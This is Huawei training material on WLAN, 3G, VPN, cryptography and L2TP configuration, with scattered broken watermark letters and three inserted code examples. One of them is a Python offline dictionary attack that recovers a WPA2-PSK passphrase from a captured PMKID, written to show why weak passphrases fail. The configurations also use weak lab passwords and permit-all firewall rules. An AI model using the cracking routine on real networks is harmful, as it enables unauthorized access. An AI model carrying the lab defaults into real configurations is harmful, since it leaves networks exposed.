Wi-Fi Protected Access (WPA)
WPA is used to ensure the security of the wireless network. WPA complies with the major IEEE 802.11i standards and improves on the WEP authentication and encryption features.

WLAN Network Topology

Figure: a headquarters site with a Fat AP serving PCs, a printer, a laptop, a Wi-Fi phone and a PDA; the Fat AP reaches the Internet over ADSL (with a VPN to the headquarters) and the PSTN/ISDN for the analogue phone, fax and video phone

WLAN Configuration Example 1 (CLI)

Figure: two stations -- (WLAN-BSS 2) -- AP, Ethernet0/0/0 -- Ethernet1/0/0, router

Networking requirements:
The AP connects to the router over the Ethernet0/0/0 interface (added to the Untrust zone).
The fixed IP address of the Ethernet0/0/0 interface is 202.169.10.1/24. The IP address of the Ethernet1/0/0 interface on the router is 202.169.10.2/24.
The IP addresses of the stations are 192.168.1.2/24 and 192.168.1.3/24.
The stations connect to the AP (SRG) using wireless network cards. The SSID is WLAN100.
The authentication mode is WPA2-PSK and the CCMP encryption suite is configured. The pre-shared key (PSK) is abcdefgh.
The WLAN is configured to provide wireless access for the stations.

WLAN Configuration Example 2 (CLI)

Configuration procedure:

Create the Vlanif 2 interface.
[SRG] interface Vlanif 2
[SRG-Vlanif2] ip address 192.168.1.1 24

Configure the WLAN-BSS interface.
[SRG] interface wlan-bss 2
[SRG-Wlan-Bss2] port access vlan 2

Configure the service class.
[SRG] wlan service-class 2 crypto
[SRG-wlan-sc-2] ssid WLAN100
[SRG-wlan-sc-2] authentication-method wpa2-psk
[SRG-wlan-sc-2] encryption-suite ccmp
[SRG-wlan-sc-2] pre-shared-key pass-phrase abcdefgh
[SRG-wlan-sc-2] service-class enable

Note: abcdefgh is an eight-character lowercase passphrase, the minimum length WPA2-PSK accepts. The PMK is derived from the passphrase and the SSID, and a captured handshake can be attacked offline, so WPA2-PSK is only as strong as the passphrase; use a long random one outside the lab.

WLAN Configuration Example 3 (CLI)

Configure the RF interface.
[SRG] interface wlan-rf 4/0/0
[SRG-Wlan-rf4/0/0] radio-type dot11gn
[SRG-Wlan-rf4/0/0] bind service-class 2 interface wlan-bss 2

Configure the wireless network card on the client.
Ensure that the SSID, encryption mode, and PSK of the wireless network card are the same as those set on the SRG.
Set the IP address of the wireless network card to 192.168.1.10/24.
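What the pre-shared key in the WLAN example actually protects, shown in code. This is an added example, not part of the Huawei training material. WPA2-PSK derives the 256-bit PMK from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, IEEE 802.11i); the PMKID that an AP may include in the first 4-way-handshake message is HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC) truncated to 128 bits. Everything an attacker needs is therefore either public or captured once, and the passphrase can be guessed offline. The SSID and passphrase are the ones from the configuration above; the MAC addresses, the "captured" PMKID and the candidate list are constructed here.

```python
"""WPA2-PSK key derivation and an offline PMKID guess (added example)."""
import hashlib
import hmac

SSID = "WLAN100"
AP_MAC = bytes.fromhex("00e0fc000001")    # constructed AP (SRG) address
STA_MAC = bytes.fromhex("001122334455")   # constructed station address


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def guess_passphrase(captured_pmkid, ssid, ap_mac, sta_mac, candidates):
    """Offline dictionary attack against a captured PMKID; no further
    contact with the AP is needed. Returns the matching passphrase or None."""
    for cand in candidates:
        trial = pmkid(wpa2_pmk(cand, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(trial, captured_pmkid):
            return cand
    return None


# constructed capture: the PMKID the AP would send for the example's PSK
CAPTURED_PMKID = pmkid(wpa2_pmk("abcdefgh", SSID), AP_MAC, STA_MAC)
WORDLIST = ["password", "12345678", "qwertyui", "abcdefgh", "WLAN100!"]

if __name__ == "__main__":
    print("PMK for the example:", wpa2_pmk("abcdefgh", SSID).hex())
    print("recovered passphrase:",
          guess_passphrase(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST))
```

Each candidate costs 4096 HMAC-SHA1 iterations, which a single GPU evaluates at a rate on the order of hundreds of thousands of candidates per second, so an eight-letter lowercase passphrase such as abcdefgh does not survive a dictionary or brute-force search. A long random passphrase, or WPA2-Enterprise (802.1X) where the PMK is not derived from a shared secret, removes this attack.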

3G Overview

What is 3G?

3G standards:
WCDMA
TD-SCDMA
CDMA2000

3G applications

3G Implementation Modes

The data card determines the supported wireless interface standard. At present, the USG series supports three types of data cards: data cards with an Express interface, data cards with a USB interface, and data cards with a MIC card interface.

Figure: 3G data card with Express interface; 3G data card with USB interface; 3G data card with MIC interface

Installation of 3G Data Cards

LAN users can access the WAN over the uplink provided by a 3G data card.

A device supports only one 3G data card at a time; you cannot install multiple 3G data cards on one device. When replacing the 3G data card, pull out the existing data card and then install the new one.

Ensure that the subscriber identity module (SIM) or UMTS subscriber identity module (USIM) is installed in the data card and that the SIM card insertion direction is correct. The SIM is provided by the carrier.

Insert the 3G data card into the corresponding port of the USG2100.

3G Implementation Principles

The 3G functions are implemented by the following modules:

Dial control center (DCC)
It determines the dialing trigger mode.

MODEM simulation
It simulates the modem to send the corresponding dialing digits.

Data card management
It manages and obtains the current data card information, including the APN configuration and status information.

Link control
It converts the received data to the required format to implement data forwarding or other functions.

3G Application Configuration Example (CLI Mode)

The USG2200 connects to the enterprise internal network over the Ethernet 1/0/0 interface and connects to the Internet over the USB 3G 5/0/0 interface. The configuration is as follows:

The enterprise network is on the network segment 192.168.1.0/24.
Dialing is performed on the Dialer 0 interface.
The IP address of the Express-3G interface is allocated by the wireless network through negotiation.

Figure: networking diagram of dialing over the Dialer interface

3G Typical Configuration (CLI)

n
e
/

m
o
c

.
i
e

w
a
u

China Telecom CDMA2000 (E169C)

China Unicom WCDMA (E180)

China Mobile TD-SCDMA (ET128)

firewall packet-filter default permit all


dialer-rule 1 ip permit
#
interface Dialer0
link-protocol ppp
//For the CDMA2000 network, configure the PPP
authentication information.
CDMA2000:

#
firewall packet-filter default permit all
#
dialer-rule 1 ip permit
#
interface Dialer0
link-protocol ppp
ppp chap user card
ppp chap password simple card
ppp ipcp dns admit-any
ip address ppp-negotiate
dialer enable-circular
dialer-group 1    //This ID is the same as the corresponding dialer-rule ID.
dialer timer idle 60
dialer timer autodial 10
dialer number #777 autodial    //For the CDMA2000 network, the dialer number is #777.
#
interface Cellular5/0/0    //For the CDMA2000 network, no APN parameter needs to be configured.
link-protocol ppp
dialer circular-group 0    //This SN must be the same as the corresponding dialer interface number.
#
ip route-static 0.0.0.0 0.0.0.0 Dialer0

WCDMA:

#
firewall packet-filter default permit all
#
dialer-rule 1 ip permit
#
interface Dialer0
link-protocol ppp    //For the TD-SCDMA and WCDMA network, the PPP authentication is not required.
ppp ipcp dns admit-any
ip address ppp-negotiate
dialer enable-circular
dialer-group 1    //This ID is the same as the corresponding dialer-rule ID.
dialer timer idle 60
dialer timer autodial 10
dialer number *99# autodial    //The dialer number for the TD-SCDMA and WCDMA networks is *99#.
#
interface Cellular5/0/0
apn UNINET    //For the WCDMA standard, it is set to UNINET.
link-protocol ppp
dialer circular-group 0    //This SN must be the same as the corresponding dialer interface number.
#
ip route-static 0.0.0.0 0.0.0.0 Dialer0

TD-SCDMA:

#
firewall packet-filter default permit all
#
dialer-rule 1 ip permit
#
interface Dialer0
link-protocol ppp    //For the TD-SCDMA and WCDMA network, the PPP authentication is not required.
ppp ipcp dns admit-any
ip address ppp-negotiate
dialer enable-circular
dialer-group 1    //This ID is the same as the corresponding dialer-rule ID.
dialer timer idle 60
dialer timer autodial 10
dialer number *99# autodial    //The dialer number for the TD-SCDMA and WCDMA networks is *99#.
#
interface Cellular5/0/0
apn CMNET    //For the TD-SCDMA standard, it is set to CMNET.
link-protocol ppp
dialer circular-group 0    //This SN must be the same as the corresponding dialer interface number.
#
ip route-static 0.0.0.0 0.0.0.0 Dialer0

Public configuration: Add the interface to the trusted zone. Set the NAT policies for the private network users to access the public network. Set the routes to access the public network.

Copyright 2010 Huawei Technologies Co., Ltd. All rights reserved.
Page 54

3G Typical Configuration (Web)

Summary

Basic VLAN technologies
SA and E1 WAN interface technologies
Basic ADSL technologies
WLAN and 3G wireless technologies
Questions

What interface types do the VLAN support? How does each interface process the tags?
What are the encapsulation modes of the E1 data frames? What are the differences between the encapsulation modes?
What key deployment elements are involved in the ADSL configuration?
What key deployment elements are involved in the WLAN configuration?
What key deployment elements are involved in the 3G configuration?
Answer

Thank you
www.huawei.com
Chapter 6 VPN Overview
Objectives

Upon completion of this course, you will be able to:
VPN concepts
Key VPN technologies
Types and applications of VPNs
Contents

1. VPN Introduction
2. VPN Technologies
3. VPN Types
VPN Definition

VPN
A Virtual Private Network (VPN) is built by establishing private data channels over a shared public network (usually the Internet) to connect networks or terminals that need to access the private network, to form the private network guaranteeing a certain level of security and QoS.

Virtualization
Users do not need to have physical data links for long-distance transmission. Instead, long-distance data lines of the Internet are used to create a private network.

Private Network
Provides secure information transport by authenticating users and encrypting data to prevent unauthorized persons from reading the transmitted information.
Contents

1. VPN Introduction
2. VPN Technologies
3. VPN Types
Common VPN Technologies

Tunneling: Encrypts and decrypts data on both ends of a tunnel to create a data channel.
Identity authentication: Ensures the legitimacy and validity of operators to a VPN.
Data authentication: Data can be only legitimately altered when it is sent over the network.
Encryption/decryption: Ensures that data can be only legitimately captured when it is sent over the network.
Key management: The key is sent securely over an insecure network.
Tunneling

Figure: a branch, a SOHO user and an employee on a business trip are connected to the headquarters through tunnels over the Internet.
Cryptography

1.1 What is cryptography
1.2 Classification of encryption technologies
1.3 Key management technologies
Cryptography

Encryption: from plain text to cipher text

Plain text --(Key)--> C = En(K, P) --> Cipher text
Cryptography

Cryptography provides: Integrity, Confidentiality, Availability, Non-repudiation.
Development of Cryptography

Development of encryption technologies: Scytale, Caesar cipher, Rail fence cipher, Cipher machine.
Cryptography

1.1 What is cryptography
1.2 Classification of encryption technologies
1.3 Key management technologies
Key-based Classification

Key: Private key / Public key

Symmetric encryption
The same key is used for encryption and decryption.

Asymmetric encryption
Two different keys are used for encryption and decryption. What one key encrypts, only the other can decrypt. The private key is for data protection, while the public key is used by users in the same system to check the validity and identity of the information and sender.
Symmetric Encryption Algorithms

Shared key at both ends: Key = 1010110101

Sender: plain text abcdef -> Encryption algorithm (E) -> cipher text *$@g)(!34*^hcftibf
Receiver: cipher text *$@g)(!34*^hcftibf -> Decryption algorithm (D) -> plain text abcdef
Common Symmetric Encryption Algorithms

Flow (stream) encryption: RC4
Block encryption: DES, 3DES, AES, IDEA, RC2, RC5, and RC6

Figure: in flow encryption the plain text is combined with a key flow to give the cipher text; in block encryption the plain text passes through round 1 ... round N to give the cipher text.
Asymmetric Encryption Algorithms

Private key = 1010110101; Public key = 1111010101 (the public key is looked up in the public key database)

Sender (figure label: sender's public key): plain text abcdef -> Encryption algorithm (E) -> cipher text &^(#!b&%2(#c7(*@!Cs
Receiver (figure label: receiver's private key): cipher text &^(#!b&%2(#c7(*@!Cs -> Decryption algorithm (D) -> plain text abcdef
Comparison Between Symmetric and Asymmetric Algorithms

Symmetric key algorithm
Advantage: Fast encryption/decryption
Disadvantage: Transmission of keys

Asymmetric key algorithm
Advantage: High security of keys
Disadvantage: Encryption/decryption is sensitive to speed
Key Exchange

Session key

Sender:
1. Encryption: plain text "Huawei Symantec" is encrypted with the session key into cipher text "tr09 vi16vsk".
2. Encryption: the session key is encrypted with the receiver's public key.
Transmission: the cipher text and the encrypted session key are sent.
Receiver:
3. Decryption: the session key is recovered with the receiver's private key.
4. Decryption: the cipher text "tr09 vi16vsk" is decrypted with the session key into plain text "Huawei Symantec".
Hash Algorithm

Hash algorithm: input data of any length is transformed into output data of fixed length.

h = H(M)

Common hash algorithms: MD5, SHA-1
Digital Signature

Sender:
Plain text "Huawei Symantec" -> Hash function -> Summary "PGGjx&%9$"
2. The summary is encrypted with the sender's private key to produce the digital signature.
The plain text (shown in transit as "tr09 vi16vsk") and the digital signature are transmitted together.

Receiver:
Plain text "Huawei Symantec" -> Hash algorithm -> New summary
4. The digital signature is decrypted with the sender's public key to recover the summary "PGGjx&%9$".
7. Same: the new summary and the recovered summary are compared. If they match:
1. Not altered
2. Sent by the sender
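The key-exchange figure (session key under the receiver's public key) and the digital-signature figure (summary signed with the sender's private key) combined in one runnable round trip. This is an added example, not course material: it uses Go's standard crypto library (AES-256-GCM for the session-key step, RSA-OAEP to wrap the key, RSA-PSS over SHA-256 for the signature); the message "Huawei Symantec" is the figure's sample, the key pairs are generated on the spot.

```go
package main

import (
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Envelope is what the sender transmits (figure steps noted per field).
type Envelope struct {
	Nonce      []byte // AES-GCM nonce used with the session key
	Ciphertext []byte // plain text encrypted under the session key (step 1)
	WrappedKey []byte // session key encrypted under the receiver's public key (step 2)
	Signature  []byte // summary of the plain text signed with the sender's private key
}

// NewKeyPair gives one party its private/public key pair (2048-bit RSA, chosen for this example).
func NewKeyPair() (*rsa.PrivateKey, error) { return rsa.GenerateKey(rand.Reader, 2048) }

// DigestHex is the hash step h = H(M): any input length, fixed-length output.
func DigestHex(m []byte) string {
	sum := sha256.Sum256(m)
	return hex.EncodeToString(sum[:])
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal: steps 1-2 of the key-exchange figure plus the signing half of the signature figure.
func Seal(plain []byte, receiverPub *rsa.PublicKey, senderPriv *rsa.PrivateKey) (*Envelope, error) {
	sessionKey := make([]byte, 32) // fresh AES-256 key, used for this message only
	if _, err := rand.Read(sessionKey); err != nil {
		return nil, err
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := gcm.Seal(nil, nonce, plain, nil) // step 1: fast symmetric encryption of the bulk data
	// step 2: only the receiver's private key can unwrap the session key
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, receiverPub, sessionKey, nil)
	if err != nil {
		return nil, err
	}
	sum := sha256.Sum256(plain) // the summary of the figure
	sig, err := rsa.SignPSS(rand.Reader, senderPriv, crypto.SHA256, sum[:], nil)
	if err != nil {
		return nil, err
	}
	return &Envelope{Nonce: nonce, Ciphertext: ct, WrappedKey: wrapped, Signature: sig}, nil
}

// Open: steps 3-4 of the key-exchange figure, then the receiver's signature check.
func Open(env *Envelope, receiverPriv *rsa.PrivateKey, senderPub *rsa.PublicKey) ([]byte, error) {
	sessionKey, err := rsa.DecryptOAEP(sha256.New(), nil, receiverPriv, env.WrappedKey, nil) // step 3
	if err != nil {
		return nil, errors.New("session key cannot be unwrapped: not addressed to this receiver")
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	plain, err := gcm.Open(nil, env.Nonce, env.Ciphertext, nil) // step 4; the GCM tag catches alteration
	if err != nil {
		return nil, errors.New("cipher text rejected: altered in transit")
	}
	sum := sha256.Sum256(plain) // new summary, compared with the signed one
	if err := rsa.VerifyPSS(senderPub, crypto.SHA256, sum[:], env.Signature, nil); err != nil {
		return nil, errors.New("signature rejected: not sent by the claimed sender")
	}
	return plain, nil // "not altered" and "sent by the sender"
}

func main() {
	sender, _ := NewKeyPair()
	receiver, _ := NewKeyPair()
	env, err := Seal([]byte("Huawei Symantec"), &receiver.PublicKey, sender)
	if err != nil {
		panic(err)
	}
	plain, err := Open(env, receiver, &sender.PublicKey)
	fmt.Printf("recovered=%q err=%v\n", plain, err)
}
```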
Digital Certificates

Bearer of the public key
Digital certificate format: X.509
Issued by a trustworthy organization
Storage of the digital certificate

Example certificate fields:
Subject: XXX
Public key: 9f 0a 34 ...
Validity: 5/5/2008-5/5/2009
Serial Number: 123465
Issuer: CA
Signature: CA digital signature
Path to the certificate: a trusted link
Cryptography

1.1 What is cryptography
1.2 Classification of encryption technologies
1.3 Key management technologies
Key Management Technologies

Key management technologies:
Generation of keys
Assignment and storage
Replacement and destruction
Key Management System

A complete key management system should ensure that:
The key is difficult to steal or copy.
The stolen key is useless, because it is limited by the use scope and time.
Assignment and replacement of keys is transparent to users.
Core keys must be kept separately by the respective owners.
Key Management Strategy

A complete key management policy should meet the following requirements:

The password control policy allows or forbids users to reuse an old password (compulsory password history), and determines the duration between two password changes (maximum password lifetime and minimum password lifetime), the minimum password length, and the combination of case-sensitive letters, numbers, and special characters (password complexity requirements).

The account lockout policy determines how many login failures the system accepts before it locks an account within a specific time period.

Legal requirements and service contract
Contents

1. VPN Introduction
2. VPN Technologies
3. VPN Types
Service-based VPN Classification (1)

Access VPN

Figure: a mobile office employee connects through an Access VPN to the VPDN gateway at the headquarters, behind which sit the enterprise's data center and the VPN management system.

Employees of an enterprise need to work from a distance during business trips, or the enterprise needs to provide B2C secure access service.
Service-based VPN Classification (2)

Intranet VPN

Figure: a large/medium-sized branch and a small/medium-sized branch connect gateway to gateway with the headquarters, behind which sit the enterprise's data center and the VPN management system.

Interconnecting branches of an enterprise
Service-based VPN Classification (3)

Extranet VPN

Figure: a customer and a supplier connect to the headquarters, behind which sit the enterprise's data center and the VPN management system.

Providing Business to Business (B2B) secure access
Layer-based VPN Classification

Layer-3 VPN (network layer): GRE, IPSec
Layer-2 VPN (data link layer): L2F, PPTP, L2TP
Summary

VPN concepts
Key VPN technologies
Types and applications of VPNs
Questions

What are the features of symmetric encryption and asymmetric encryption respectively?
What is the difference between the encryption algorithm and the hash algorithm?
Does a longer key strengthen the encryption performance? Can we analyze it based on different encryption algorithms?
What are the functions of tunneling in the VPN technology?
Why is L2TP a L2VPN protocol, while GRE and IPSec are L3VPN protocols?
Answer

Thank you
www.huawei.com
Chapter 7 L2TP VPN
Objectives

Upon completion of this course, you will be able to:
Application scenarios of VPDN
Basic concepts of L2TP
Application scenarios of VPDN in Client-Initialized and NAS-Initialized modes
Configuration methods of L2TP
Contents

1. VPDN Overview
2. L2TP VPN Technology
3. Client-Initialized L2TP
4. NAS-Initialized L2TP
VPDN Overview

Virtual Private Dial Network (VPDN) refers to a virtual private network that is implemented through the dialing function of a public network, such as Integrated Services Digital Network (ISDN) or Public Switched Telephone Network (PSTN) and access network. VPDN can provide access for enterprises, small Internet service providers (ISPs), and mobile office users.

There are three types of VPDN tunneling protocols, namely, Point-to-Point Tunneling Protocol (PPTP), L2F, and Layer 2 Tunneling Protocol (L2TP). Currently, L2TP is widely used.

Network device and VPDN gateway: The client is directly connected to the enterprise gateway through the Point-to-Point Protocol (PPP). Currently, Layer 2 Forwarding (L2F) and Layer 2 Tunneling Protocol are available.

Client and VPDN gateway: The client is connected to the Internet and then to the gateway through certain dedicated software, for example, the L2TP client supported by Windows 2000.
Contents

1. VPDN Overview
2. L2TP VPN Technology
3. Client-Initialized L2TP
4. NAS-Initialized L2TP
L2TP Overview

L2TP is short for Layer Two Tunneling Protocol.

It is developed for the transparent transmission of PPP packets between users and enterprise servers. It provides a tunnel for transmitting PPP packets at the data link layer.

It combines the advantages of L2F and PPTP. Therefore, it becomes the industrial standard for Layer-2 protocols of IETF.

Main usage: Remote branches and employees on business trips of an enterprise can access the headquarters network through the virtual tunnel established on the public network.
Features of L2TP

L2TP features: High reliability; Identity authentication; Multi-protocol transmission; Flexible accounting; Internal address assignment; RADIUS support.
L2TP VPN Protocol Components

Figure: an employee on a business trip reaches the LAC over PSTN/ADSL; an L2TP tunnel carrying sessions runs from the LAC to the LNS at the headquarters. The LAC and the LNS each use a RADIUS server (LAC RADIUS, LNS RADIUS).

L2TP message: Data message / Control message
LAC: L2TP Access Concentrator
LNS: L2TP Network Server
L2TP Protocol Stack and Encapsulation Process

Structure of the L2TP Protocol Stack:
Public IP header | UDP | L2TP | PPP | Private IP header | Data

L2TP Encapsulation Process:
Client: Private IP / PPP / Link layer / Physical layer
LAC: Private IP / PPP / L2TP / UDP / Public IP / Link layer / Physical layer
LNS: Private IP / PPP / L2TP / UDP / Public IP / Link layer / Physical layer
Server: Private IP / Link layer / Physical layer
L2TP Messages and Formats

Control message: Applies to the establishment, maintenance, and transmission control of tunnel and session connections.
Data message: Encapsulates PPP frames and transmits them along the tunnel.

L2TP header format (bit positions 0-31):
bits 0-11: T L X X S X O P X X X X; bits 12-15: Version; bits 16-31: Length
Tunnel ID (16 bits) | Session ID (16 bits)
Ns (16 bits) | Nr (16 bits)
Offset size (16 bits) | Offset pad

T indicates the message type. 1: control message; 0: data message.
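A parser and builder for the header laid out above, added here as an example (not course material) so the flag bits can be checked on real bytes. The flag rules it enforces beyond the slide's T bit (a control message must carry Length and Ns/Nr and must not set O or P; the version must be 2) come from RFC 2661; the sample messages in main() are constructed, with tunnel 1 / session 8 taken from the display output later in this chapter.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Flag bits of the first 16-bit word of the L2TP header (RFC 2661).
const (
	flagT   = 0x8000 // message type: 1 = control, 0 = data
	flagL   = 0x4000 // Length field present
	flagS   = 0x0800 // Ns/Nr fields present
	flagO   = 0x0200 // Offset Size field present
	flagP   = 0x0100 // priority (data messages only)
	verMask = 0x000F // protocol version, must be 2
)

// Header holds the parsed fields; HasLen/HasSeq say which optional ones were present.
type Header struct {
	Control, Priority, HasLen, HasSeq bool
	Version                           uint8
	Length, TunnelID, SessionID       uint16
	Ns, Nr                            uint16
	Payload                           []byte // control AVPs or the encapsulated PPP frame
}

// Parse decodes one L2TP message, rejecting headers that break the RFC rules.
func Parse(b []byte) (*Header, error) {
	if len(b) < 6 {
		return nil, errors.New("truncated: header needs at least 6 bytes")
	}
	flags := binary.BigEndian.Uint16(b)
	h := &Header{
		Control: flags&flagT != 0, Priority: flags&flagP != 0,
		HasLen: flags&flagL != 0, HasSeq: flags&flagS != 0,
		Version: uint8(flags & verMask),
	}
	hasOff := flags&flagO != 0
	if h.Version != 2 {
		return nil, fmt.Errorf("unsupported L2TP version %d", h.Version)
	}
	// Control messages MUST carry Length and Ns/Nr and MUST NOT set O or P.
	if h.Control && (!h.HasLen || !h.HasSeq || hasOff || h.Priority) {
		return nil, errors.New("malformed control message flags")
	}
	pos := 2
	if h.HasLen {
		h.Length = binary.BigEndian.Uint16(b[pos:]) // the 6-byte minimum guarantees b[2:4] exists
		pos += 2
		if int(h.Length) > len(b) || int(h.Length) < pos+4 {
			return nil, errors.New("Length field inconsistent with the datagram")
		}
		b = b[:h.Length] // bytes beyond Length are not part of the message
	}
	if len(b) < pos+4 {
		return nil, errors.New("truncated: missing Tunnel ID / Session ID")
	}
	h.TunnelID = binary.BigEndian.Uint16(b[pos:])
	h.SessionID = binary.BigEndian.Uint16(b[pos+2:])
	pos += 4
	if h.HasSeq {
		if len(b) < pos+4 {
			return nil, errors.New("truncated: missing Ns / Nr")
		}
		h.Ns = binary.BigEndian.Uint16(b[pos:])
		h.Nr = binary.BigEndian.Uint16(b[pos+2:])
		pos += 4
	}
	if hasOff {
		if len(b) < pos+2 {
			return nil, errors.New("truncated: missing Offset Size")
		}
		off := int(binary.BigEndian.Uint16(b[pos:]))
		pos += 2
		if len(b) < pos+off {
			return nil, errors.New("Offset Size points past the end of the message")
		}
		pos += off // skip the offset pad
	}
	h.Payload = b[pos:]
	return h, nil
}

// Build serialises a version-2 header; control messages get the mandatory L and S bits.
func Build(control bool, tunnelID, sessionID, ns, nr uint16, payload []byte) []byte {
	var out []byte
	put := func(v uint16) { out = append(out, byte(v>>8), byte(v)) }
	flags := uint16(2)
	if control {
		flags |= flagT | flagL | flagS
	}
	put(flags)
	if control {
		put(0) // Length placeholder, patched once the message is complete
	}
	put(tunnelID)
	put(sessionID)
	if control {
		put(ns)
		put(nr)
	}
	out = append(out, payload...)
	if control {
		binary.BigEndian.PutUint16(out[2:], uint16(len(out)))
	}
	return out
}

func main() {
	// Constructed samples: a control message on tunnel 1 with a 4-byte stand-in payload, and a
	// data message for session 8 carrying a PPP frame (ff 03 = address/control, 00 21 = IP).
	ctl := Build(true, 1, 0, 0, 0, []byte{0x00, 0x08, 0x00, 0x00})
	data := Build(false, 1, 8, 0, 0, []byte{0xff, 0x03, 0x00, 0x21, 0x45})
	for _, m := range [][]byte{ctl, data} {
		h, err := Parse(m)
		fmt.Printf("%+v err=%v\n", h, err)
	}
}
```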
L2TP Session Establishment Process
Contents

1. VPDN Overview
2. L2TP VPN Technology
3. Client-Initialized L2TP
4. NAS-Initialized L2TP
L2TP VPN Initiated by a Remote Dial-Up User

Figure: a remote user, a remote branch and a mobile office employee each establish an L2TP tunnel to the LNS, which fronts the headquarters server.

VPN acts as a trunk; LNS acts as a checkpoint.
LNS: You can pass through.
VPN user: OK. I send the goods by myself.
Typical Configuration of L2TP VPN: Client-LNS

Figure: Mobile office employee -- Internet -- LNS (E1/0/1 3.3.2.1/16 on the Internet side, E1/0/0 192.168.1.1/24 on the headquarters side) -- Headquarters

Networking requirements
An enterprise sets up a VPN network. There is a VPN gateway (that is, USG firewall) at the egress of the public network of the headquarters. Mobile office employees need to communicate with the service server in the enterprise through the L2TP tunnel.
The LNS uses local authentication. Here:
LNS is a USG firewall.
L2TP Configuration Client

Start
Enable tunnel authentication.
Configure the IP address of the LNS server.
Disable IPSec.
Configure the authentication mode.
Configure the user name and password.
End
L2TP Configuration LNS

Start
Perform basic configuration (including interface IP address).
Configure virtual interface template.
Configure L2TP group of the LNS end.
In the AAA view, configure the user name of the VPDN group.
Enable the interzone filtering rule.
Enable L2TP.
End
Typical Configuration of L2TP VPN: LNS (1)

Create a virtual interface template.
[LNS] interface Virtual-Template 1
Set the IP address of the virtual interface template.
[LNS-Virtual-Template1] ip address 10.1.1.1 24
Configure the PPP authentication mode.
[LNS-Virtual-Template1] ppp authentication-mode chap
Assign an IP address from the address pool to the peer interface.
[LNS-Virtual-Template1] remote address pool 1
Typical Configuration of L2TP VPN: LNS (2)

Add the virtual interface template to a security zone.
[LNS-zone-trust] add interface Virtual-Template 1
Enable L2TP.
[LNS] l2tp enable
Configure an L2TP group.
[LNS] l2tp-group 1
Specify the name and Virtual-Template of the tunnel peer when receiving a call.
[LNS-l2tp1] allow l2tp virtual-template 1 remote Client01
Enable L2TP tunnel authentication.
[LNS-l2tp1] tunnel authentication
Set an L2TP tunnel authentication password.
[LNS-l2tp1] tunnel password simple hello
Typical Configuration of L2TP VPN: LNS (3)

Configure the tunnel name of the local end.
[LNS-l2tp1] tunnel name lns
Enter the AAA view.
[LNS] aaa
Create the name and password of the local user.
[LNS-aaa] local-user pc1 password simple pc1pc1
Configure the user type.
[LNS-aaa] local-user pc1 service-type ppp
Configure a public IP address pool.
[LNS-aaa] ip pool 1 4.1.1.1 4.1.1.99
Configure default interzone packet-filtering rules.
[LNS] firewall packet-filter default permit interzone local untrust
Contents

1. VPDN Overview
2. L2TP VPN Technology
3. Client-Initialized L2TP
4. NAS-Initialized L2TP
L2TP VPN NAS Initiated

Figure: a remote user (PPP over the PSTN), a branch (PPPoE over Ethernet) and a mobile office employee reach the LAC; the LAC carries their traffic over L2TP tunnels to the LNS, which fronts the headquarters server.

VPN user acts as a trunk; LAC acts as a forwarder.
LAC: Your goods can pass through. May I help you?
VPN user: Deliver the goods to No. XX of XX Street.
Typical Configuration of L2TP VPN: LAC-LNS

Figure: Branch -- LAC (E0/0/0 1.1.1.1/24 on the branch side, E0/0/1 2.2.1.1/16 on the Internet side) -- Internet -- LNS (E1/0/1 3.3.2.1/16 on the Internet side, E1/0/0 3.1.1.1/24 on the headquarters side) -- Headquarters

Networking requirements:
A company sets up a VPN network. There is a VPN gateway (that is, USG firewall) at the egress of the public network of the headquarters. Mobile office employees need to communicate with the service server in the enterprise through the L2TP tunnel.
LNS uses local authentication. Here:
LAC acts as a USG firewall.
LNS acts as a USG firewall.
n
e
/

m
o
c

L2TP Configuration LAC


Start
Perform basic configuration (including interface IP address).
Configure virtual interface template and bind to the physical interface.
Configure the L2TP group of the LNS end.
In the AAA view, configure the user name of the VPDN group.
Enable the interzone filtering rule.
Enable L2TP.
End
n
e
/

m
o
c

L2TP Configuration LNS

Start
Perform basic configuration (including interface IP address).
Configure the virtual interface template.
Configure the L2TP group of the LNS.
In the AAA view, configure the accounts of the VPDN group.
Enable the interzone filtering rule.
Enable L2TP.
End
Typical Configurations of L2TP VPN: LAC (1)

Create a virtual template interface.
[LAC] interface Virtual-Template 1
Configure the PPP authentication mode.
[LAC-Virtual-Template1] ppp authentication-mode chap
Bind the interface to the virtual interface template.
[LAC] interface ethernet 0/0/0
[LAC-Ethernet0/0/0] pppoe-server bind virtual-template 1
Add the virtual interface template to the security zone.
[LAC] firewall zone trust
[LAC-zone-trust] add interface Virtual-Template 1
[LAC-zone-trust] add interface ethernet 0/0/0
Typical Configurations of L2TP VPN: LAC (2)

Enable L2TP.
[LAC] l2tp enable
Create an L2TP group.
[LAC] l2tp-group 1
Set a peer IP address for the L2TP tunnel.
[LAC-l2tp1] start l2tp ip 3.3.2.1 fullusername pc1 (domain hs.com)
Start L2TP tunnel authentication.
[LAC-l2tp1] tunnel authentication
Configure an authentication password for the L2TP tunnel.
[LAC-l2tp1] tunnel password simple hello
Typical Configurations of L2TP VPN: LAC (3)

Configure the name of the local end of the tunnel.
[LAC-l2tp1] tunnel name lac
Enter AAA view.
[LAC] aaa
Configure the name and password for the local user.
[LAC-aaa] local-user pc1 password simple pc1pc1
Configure the default interzone packet filtering policy.
